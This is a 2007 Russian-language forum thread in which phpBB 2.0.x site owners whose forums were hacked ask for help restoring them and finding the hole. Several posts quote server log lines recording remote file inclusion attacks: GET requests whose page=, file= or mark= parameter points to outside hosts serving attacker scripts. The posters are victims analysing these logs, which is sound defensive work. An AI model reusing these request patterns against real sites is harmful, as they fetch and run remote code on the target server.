Взломали форум phpBB 2.0.21, нужна помощь восстановить!

[Boglik]

Сноси строку. А что вместо нее ставить - уже хз.

[Палыч]

phpbb_categories > forum_name:

А с какого перепугу там forum_name?
http://www.phpbbdoctor.com/doc_columns.php?id=3

Нах...

[Hatch]

А с какого перепугу там forum_name?

Палыч, я уж и не припомню откуда, я переделывал таблицы в БД было дело)))
С этим я разобрался, идем дальше:

Я вот в логах, нашел инклуд, видимо удаленный шелл!?:
Date: 12 Nov 2007 02:33 am
URL: /forum/viewtopic.php?p=3575/%22/index.php?page=%22http://bokreta.nl/id.txt?
Agent: libwww-perl/5.803
IP: 65.23.154.7

[Boglik]

Hatch, скорее всего. Сейчас я у себя на сервере протестирую, но судя по тому, что находится на http://bokreta.nl, и как идет строка - воспользовались инклудом.
Хех, у меня не прокатило.
Но полностью уверен, что да.
Еще подобные строки есть?

P.S. А понял, действовали через эксплоит. Вообщем, добавляй строки /%22/ и %22 в базу.

[Hatch]

2Boglik
Скорее всего) Еще куча инъекций было в posting.php и privmsg.php, вчера все логи затерлись((( Есть один нюанс, у меня на хостинге логи только в кол-ве 300 шт. хранятся, потом затираются. К сожалению много чего мы уже не узнаем( У меня есть архив с логами за ноябрь, если интересует могу скинуть, я его и сам еще не просмотрел.

Кстати меня до сих пор атакуют, в окне мода "чатбокс" постоянно всплывает сообщение "Hacking Attempt!")))

Один вопрос! Где в БД найти значение опции ?принимать куки с безопасного соединения? (точное значение строки я не помню), т.е. мне с TRUE нужно установить на FALSE, потому что не все пользователи могут авторизоваться на форуме из-за этого.

[crash]

phpbb_config, поле помоему называется secure_cookie

[Hatch]

phpbb_config, поле помоему называется secure_cookie

Нашел, спасибо!
Только поле называется: cookie_secure
_Респект_ Crash

[Boglik]

Кстати меня до сих пор атакуют, в окне мода "чатбокс" постоянно всплывает сообщение "Hacking Attempt!")))

С этого места поподробнее...
Hacking Attempt всплывает, когда дыра залатана, а ты в эту дырку прешься.
Скидывай за ноябрь, глянем.
Кста, http://k-orda.kz/board/ глянь и исправь

[Shock13666]

Javascript они обычно записывают в описание, или название форума, что редактируется на странице общих настроек форума в админке. Как зайти в админку? Перед заходом на форум отключить Javascript

[Flexis]

Всем здрасте!

Можно мне продолжить вашу увлекательную тему??

Постигла та же напасть, что и Hatch\\\'a. Только с несколько другим сценарием. Взломали сайт. Не могу точно сказать, что именно через форум. У меня на сайте стоит ещё гостевая advanced guestbook. Но ломились и через форум и через гостевую.
Версия форума phpBB-2.0.22. Что само по себе уже неприятно, т.к. если взламывали его, то обновляться, как я понимаю, пока не на что.
Вот примеры http-логов:

64.38.50.26 - - [20/Nov/2007:12:24:32 -0500] \\\"GET /forum//index.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1\\\" 401 - \\\"-\\\" \\\"libwww-perl/5.79\\\"
83.13.112.58 - - [20/Nov/2007:21:56:01 -0500] \\\"GET /forum//index.php?file=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1\\\" 200 49942 \\\"-\\\" \\\"libwww-perl/5.65\\\"
201.91.219.205 - - [22/Nov/2007:18:14:40 -0500] \\\"GET /forum/index.php?mark=http%3A%2F%2Fwww.filter-international.com%2Flykoon%2Fcimawol%2Fdeqube%2F&sid=2f322f2bb13864efe0767bb25b77f077 HTTP/1.0\\\" 403 - \\\"-\\\" \\\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\\\"

Вопрос: если ответ сервера на подобную конструкцию 200, это значит сторонний скрипт был выполнен?
Как узнать, через что именно проникли, через форум или гостевую?

Пока не вижу признаков того, чтобы залезли в базу форума. Просто напичкали вирусов во все индексные файлы почти во всех вложенных папках на аккаунте, т.е. index.html, index.php, и ещё в файл login.php - вход на форум. Почему-то только в них.
у меня уже насобиралась целая коллекция эксплоитов, которыми терзали мой сайт.
Помогите, пожалуйста, разобраться, где дыра!

[Boglik]

Тебе надо на сайт Секлаба или Античата - там помогут быстрее.
Хм. Попробую разобраться.
1) advanced guestbook какой версии?
2) Какой у тебя хостер? Если Онлайн-нет - все становится ясно. Если к примеру Петерхост, ситуация меняется.
Взлом может ощуществляется не только через phpbb, но так же и через конфигурацию сервера(апача, php, phpmyadmin и пр.)
Может такая ситуация возникнуть, что взломали сам сервер. Не тебя, и заразили вышеописанные файлы на всех сайтах.
3) Дай адрес сайта. Можно через личку.

/forum//index.php?file=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1\\\" 401 - \\\"-\\\" \\\"libwww-perl/5.79\\\"

Требовании авторизации. Ты скрыл вопросиками содержание, хз, что там было.

83.13.112.58 - - [20/Nov/2007:21:56:01 -0500] \\\"GET /forum//index.php?file=http://www.statestreetmadison.com/cms/cache/id?? HTTP/1.1\\\" 200 49942 \\\"-\\\" \\\"libwww-perl/5.65\\\"

Здесь все сработало. Да, 200 - это успешная обработка данных.

201.91.219.205 - - [22/Nov/2007:18:14:40 -0500] \\\"GET /forum/index.php?mark=http%3A%2F%2Fwww.filter-international.com%2Flykoon%2Fcimawol%2Fdeqube%2F&sid=2f322f2bb13864efe0767bb25b77f077 HTTP/1.0\\\" 403 - \\\"-\\\" \\\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\\\"

Везде как я вижу -
это инклуд. Все же чтобы полностью быть уверен, дай адрес сайта.
Да, чуть не забыл, пробей адреса ай-пи на http://domainsdb.net

[Ne$ter]

Вечер добрый всем, у меня тоже был взломан форум, в итоге не загружалась только главная страница, был заменён index.php, всё стало на свои места, но заметил что исправлени все index файли были заменены , но не могу зайти в админ панель, вот что пишет


Warning: include(./extension.inc) [function.include]: failed to open stream: No such file or directory in /usr/home/sofia-audit/data/www/forum.sofia-audit.com/admin/index.php on line 25

Warning: include() [function.include]: Failed opening './extension.inc' for inclusion (include_path='.:/php/includes:/usr/local/share/pear') in /usr/home/sofia-audit/data/www/forum.sofia-audit.com/admin/index.php on line 25

Notice: Undefined variable: phpEx in /usr/home/sofia-audit/data/www/forum.sofia-audit.com/admin/index.php on line 26

Warning: include(./common.) [function.include]: failed to open stream: No such file or directory in /usr/home/sofia-audit/data/www/forum.sofia-audit.com/admin/index.php on line 26

Warning: include() [function.include]: Failed opening './common.' for inclusion (include_path='.:/php/includes:/usr/local/share/pear') in /usr/home/sofia-audit/data/www/forum.sofia-audit.com/admin/index.php on line 26

Fatal error: Call to undefined function session_pagestart() in /usr/home/sofia-audit/data/www/forum.sofia-audit.com/admin/index.php on line 31

подскажите пожалуста, и скажите как был взломан форум, как защитится от повторного?

[crash]

подскажите пожалуста, и скажите как был взломан форум

протелепатировать чтоли?

[ParSulTang]

У меня мелкий оффтоп: ветка phpbb 2.0.x будет дальше развиваться или уже только 3.0?

[crash]

ParSulTang
Ветка 2.0.х давно уже не развивается. Были только залатывания уязвимостей.